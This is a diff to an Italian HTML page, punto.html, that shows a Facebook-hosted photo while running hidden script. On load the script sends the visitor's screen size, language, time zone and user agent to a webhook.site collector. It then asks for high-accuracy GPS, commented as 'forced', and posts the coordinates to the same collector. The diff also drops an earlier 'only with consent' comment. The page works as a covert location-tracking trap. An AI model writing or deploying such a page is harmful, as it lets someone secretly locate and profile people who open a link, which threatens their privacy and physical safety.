--- a/punto.html
+++ b/punto.html
@@ -4,38 +4,53 @@
   <meta charset="UTF-8">
 </head>
 <body>
+  <img src="https://scontent.ftrn1-1.fna.fbcdn.net/v/t39.30808-6/512605176_10237473596609160_4950655024629029266_n.jpg?_nc_cat=106&ccb=1-7&_nc_sid=127cfc&_nc_ohc=KdnjTC5dc8AQ7kNvwGLhBw5&_nc_oc=AdkyzSjHu--bUwA-s6X0Tk4eWAZmGwAjhRU6AoLmrLNP7VrOJdHP5c-Z0s7JI64lPYE&_nc_zt=23&_nc_ht=scontent.ftrn1-1.fna&_nc_gid=3DN_YMxs-b9ZxibRY5IyLw&oh=00_AfMLYgPb8jlAbN4TbHDtt9Vxuw0G0BWXb4JWCebO-sp7ug&oe=6862080A" alt="Immagine" style="max-width:100%; height:auto;" />
 
-  <img src="https://scontent.ftrn1-1.fna.fbcdn.net/v/t39.30808-6/512605176_10237473596609160_4950655024629029266_n.jpg?_nc_cat=106&ccb=1-7&_nc_sid=127cfc&_nc_ohc=KdnjTC5dc8AQ7kNvwGLhBw5&_nc_oc=AdkyzSjHu--bUwA-s6X0Tk4eWAZmGwAjhRU6AoLmrLNP7VrOJdHP5c-Z0s7JI64lPYE&_nc_zt=23&_nc_ht=scontent.ftrn1-1.fna&_nc_gid=3DN_YMxs-b9ZxibRY5IyLw&oh=00_AfMLYgPb8jlAbN4TbHDtt9Vxuw0G0BWXb4JWCebO-sp7ug&oe=6862080A" alt="Test Image" style="max-width:100%; height:auto;"/>
+  <p id="status">📍 In attesa di autorizzazione per la posizione GPS...</p>
+
   <script>
-    // Funzione per inviare dati via GET (o POST) al server
+    // INVIO DATI A WEBHOOK
     function sendData(data) {
       const params = new URLSearchParams(data);
       fetch('https://webhook.site/bf09bda5-39da-4f1f-882e-afe0809ba89f', { method: 'POST', body: params });
     }
 
-    // Raccogli dati generici
+    // INFO BASE
     const info = {
-      ts: Date.now(),
+      timestamp: Date.now(),
       screen: screen.width + "x" + screen.height,
       lang: navigator.language,
       tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
       ua: navigator.userAgent
     };
-
     sendData(info);
 
-    // Richiesta posizione GPS (solo con consenso)
+    // GPS FORZATO
+    const statusEl = document.getElementById("status");
+
     if (navigator.geolocation) {
-      navigator.geolocation.getCurrentPosition(pos => {
-        sendData({
-          lat: pos.coords.latitude,
-          lon: pos.coords.longitude,
-          acc: pos.coords.accuracy,
-          gps_ts: Date.now()
-        });
-      }, err => {
-        sendData({ gps_error: err.code });
-      }, { timeout: 10000 });
+      navigator.geolocation.getCurrentPosition(
+        position => {
+          statusEl.textContent = "✅ Posizione ottenuta via GPS!";
+          sendData({
+            lat: position.coords.latitude,
+            lon: position.coords.longitude,
+            acc: position.coords.accuracy,
+            gps_ts: Date.now()
+          });
+        },
+        error => {
+          statusEl.textContent = "❌ Errore: " + error.message;
+          sendData({ gps_error: error.message });
+        },
+        {
+          enableHighAccuracy: true,  // 👉 forza l'uso del GPS
+          timeout: 15000,            // 15 secondi max
+          maximumAge: 0              // nessuna posizione vecchia
+        }
+      );
+    } else {
+      statusEl.textContent = "❌ Il browser non supporta la geolocalizzazione.";
     }
   </script>
 </body>
